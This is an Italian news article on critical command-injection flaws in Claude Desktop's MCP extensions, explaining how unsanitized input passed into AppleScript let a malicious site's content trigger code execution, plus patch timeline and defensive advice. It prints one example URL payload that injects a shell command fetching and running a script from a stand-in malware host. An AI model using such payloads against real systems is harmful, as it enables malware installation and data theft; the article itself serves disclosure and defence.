Claude Desktop: Estensioni colpite da gravi falle di sicurezza

Claude desktop: estensioni colpite da gravi falle di sicurezza

Le recenti vulnerabilità scoperte nelle estensioni ufficiali di Claude Desktop hanno permesso, per diverse settimane, il rischio concreto che un semplice quesito rivolto all’assistente AI potesse trasformarsi in un attacco informatico. Proteggi subito il tuo dispositivo: aggiorna tutte le estensioni Claude Desktop all’ultima versione. Verifica che il software sia stato riavviato dopo l’aggiornamento e considera di limitare l’uso di estensioni che operano con permessi elevati. Non ignorare gli aggiornamenti di sicurezza!

Gravi vulnerabilità RCE nelle estensioni di Claude Desktop: analisi approfondita

Negli ultimi giorni sono state rese pubbliche falle di sicurezza estremamente critiche nelle estensioni più popolari di Claude Desktop – Chrome, iMessage e Apple Notes – tutte sviluppate direttamente da Anthropic. Il problema non ha risparmiato oltre 350.000 installazioni, esponendo utenti privati e aziende al rischio concreto di remote code execution (RCE), cioè la possibilità per un attaccante di eseguire comandi malevoli sul computer vittima senza alcuna interazione esplicita.

Come funzionava la vulnerabilità

Le estensioni incriminate utilizzavano il protocollo MCP (Model Context Protocol) per integrare Claude AI con applicazioni e servizi sul sistema operativo dell’utente. Diversamente dalle tipiche estensioni browser, che operano in ambienti isolati (sandbox), queste estensioni godevano di pieni permessi di sistema, permettendo la lettura di file, l’esecuzione di comandi e la modifica di impostazioni su macOS e Windows.

Il problema principale era legato a una classica falla di command injection: le estensioni prendevano input diretto dall’utente (ad esempio una URL ricevuta con una semplice domanda), inserendolo in una stringa AppleScript o simile, senza adeguata sanitizzazione. Così, un attaccante poteva fornire input appositamente modificati, che il software interpretava come comandi di sistema. In pratica, un utente ignaro avrebbe potuto chiedere, ad esempio, “dove posso giocare a paddle a Milano?”, e quella domanda, se originata da un sito o servizio malevolo, poteva scatenare l’esecuzione di codice remoto, compromettendo tutto il dispositivo.

Esempio concreto: un URL come https://attacker.com/legit?param="& do shell script "curl https://malware.com/evil | sh"&" consentiva a un malintenzionato di scaricare ed eseguire malware semplicemente ricevendo il comando all’interno di una risposta di Claude.

Impatti e rischi: cosa poteva succedere?

Le conseguenze di una vulnerabilità RCE in estensioni così privilegiate sono estremamente gravi:

  • Accesso a dati sensibili: SSH keys, credenziali AWS, password del browser, file privati e configurazioni potevano essere sottratti senza alcun avviso.
  • Installazione di malware: l’attaccante poteva installare trojan, ransomware, o spyware.
  • Compromissione duratura: una volta ottenuto accesso, l’attaccante poteva modificare configurazioni di sistema, persistere attraverso reboot e muoversi lateralmente nella rete aziendale.
  • Zero interazioni sospette: la vittima non doveva cliccare link sospetti, né scaricare file: bastava usare Claude con una delle estensioni vulnerabili.

Il ruolo delle estensioni MCP e la differenza dai plugin browser

Mentre le estensioni Chrome operano in modalità “sandbox”, limitate dai permessi web, le estensioni desktop MCP collegate a Claude sono pensate per connettere l’intelligenza artificiale direttamente al sistema operativo: eseguono AppleScript o comandi shell, accedono a directory e servizi locali.

Questo approccio, se non progettato con attenzione, rappresenta un rischio enorme: qualsiasi falla di sanitizzazione degli input comporta la possibilità di attacchi automatizzati di elevatissimo impatto, sia per utenti singoli che per grandi reti aziendali.

Cronologia della scoperta e fix

  • Luglio 2025: Il problema viene segnalato tramite il programma di bug bounty HackerOne di Anthropic.
  • Novembre 2025: I dettagli tecnici vengono pubblicati dagli esperti di sicurezza (tra cui Koi Security), con CVSS 8.9 (critical severity).
  • Versione 0.1.9: Anthropic rilascia la patch correttiva per tutte le estensioni, confermando la risoluzione delle falle.

Chi non aggiorna oltre questa versione è ancora vulnerabile agli attacchi RCE descritti.

Analisi tecnica: perché il bug era così pericoloso?

Dal report tecnico emerge che la vulnerabilità era causata da una programmazione ingenua: gli sviluppatori affidavano input esterno (come domande dell’utente o parametri URL) direttamente a template AppleScript, senza validare o filtrare caratteri potenzialmente pericolosi (", &, $, |, ecc).

Questa omessa sanitizzazione è una delle cause più comuni di attacchi RCE, da decenni catalogata e relativamente facile da evitare con buone pratiche di programmazione. Tuttavia, la complessità nell’integrare AI conversazionali con sistema operativo – dove le frontiere tra “comando innocuo” e “comando malevolo” sono sottilissime – ha portato gli sviluppatori di Anthropic a trascurare questi rischi.

Comparazione tra vulnerabilità: Claude Desktop vs. altri strumenti AI

Un trend preoccupante: le estensioni MCP e gli strumenti AI integrati nelle piattaforme desktop stanno diventando sempre più vettori di attacco. Rispetto ai plugin semplici che operano su cloud, gli strumenti che accedono a directory locali, terminali e protocolli di sistema offrono agli hacker molte più opportunità di infiltrazione.

Estensioni come quelle di Claude Desktop sono solo l’ultimo esempio; analoghe vulnerabilità sono state segnalate anche per estensioni Visual Studio Code e IDE, spesso per mancanza di autenticazione tra client e server locale, permettendo a siti web malevoli di connettersi ai server di Claude e lanciare comandi arbitrari.

Azioni della community e delle aziende di sicurezza

  • Diversi ricercatori, tra cui JFrog Security e Koi Security, hanno analizzato la vulnerabilità, evidenziando la necessità di validazione rigorosa su input esterni, specialmente in estensioni che operano fuori dal sandbox del browser.
  • Anthropic ha risposto tempestivamente, rimuovendo le versioni vulnerabili dagli store di estensioni e forzando l’aggiornamento automatico.

Come proteggersi (parte introduttiva)

Consigli immediati per tutti gli utenti:

  • Aggiornare subito le estensioni Claude Desktop alla versione più recente.
  • Riavviare il software dopo l’aggiornamento per assicurarsi che le patch siano operative.
  • Limitare l’uso di estensioni con permessi elevati: assicurarsi che siano indispensabili prima di installarle.

Considerazioni di sicurezza a medio-lungo termine

La vicenda Claude Desktop porta al centro della discussione la gestione della sicurezza negli strumenti AI, soprattutto quelli che dialogano direttamente con il sistema operativo. Le aziende devono adottare procedure sempre più rigorose:

  • Validazione degli input in ogni estensione desktop o server locale collegata a chatbot e assistenti AI.
  • Isolamento dei processi AI dai servizi critici, usando containerizzazione e sandbox dove possibile.
  • Verifica costante e revisione del codice sorgente da parte di specialisti esterni, non solo test automatici AI che – come dimostrato – possono “confondersi” e marcare come sicura una vulnerabilità reale.
  • Audit di sicurezza periodici e training dedicato agli sviluppatori su rischi di command injection e RCE.

I dati parlano chiaro: chi può essere colpito?

Non solo utenti privati ma anche aziende, professionisti IT, chiunque abbia collegato Claude Desktop alle proprie credenziali aziendali, repository cloud, ambienti di sviluppo o servizi di autenticazione. Il rischio di furto dati, sabotaggio o installazione di malware era reale e immediato.

Riflessioni finali e scenari futuri

Il caso Anthropic dimostra quanto sia sottile il confine tra innovazione e rischio nei software AI: strumenti pensati per semplificare il lavoro possono diventare, in assenza di buone pratiche di sicurezza, “ponti” per attacchi di ampia scala.

Solo l’adozione rigorosa di procedure di sicurezza, aggiornamento continuativo e verifica professionale può proteggere dalle vulnerabilità che gli stessi sviluppatori – in buona fede – possono introdurre nei prodotti più diffusi.

Consigli/azioni avanzate per utenti e amministratori IT:

  • Monitorare regolarmente i log di sistema relativi ad accessi, esecuzione di script e cambiamenti nei file sensibili.
  • Utilizzare strumenti di scansione integrità file e comportamentali per individuare attività sospette post-installazione delle estensioni.
  • Impostare policy restrittive antivirus e firewall sui servizi collegati ad assistenti AI, limitando la comunicazione tra MCP server e siti web non autorizzati.
  • Adottare la segmentazione della rete: evitare che AI installate su dispositivi di produzione possano accedere a dati critici se non strettamente necessario.
  • Formare il personale tecnico sugli scenari di attacco possibili tramite chatbot e strumenti AI desktop: la consapevolezza è la prima linea di difesa.

Mantieni sempre aggiornati i tuoi strumenti, verifica le fonti ufficiali dei plugin, e non sottovalutare nessun alert di sicurezza. La protezione dell’ecosistema AI richiede collaborazione costante tra utenti, aziende e ricercatori.

Fonte: https://gbhackers.com/claude-desktop-hit-by-critical-rce-flaws

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto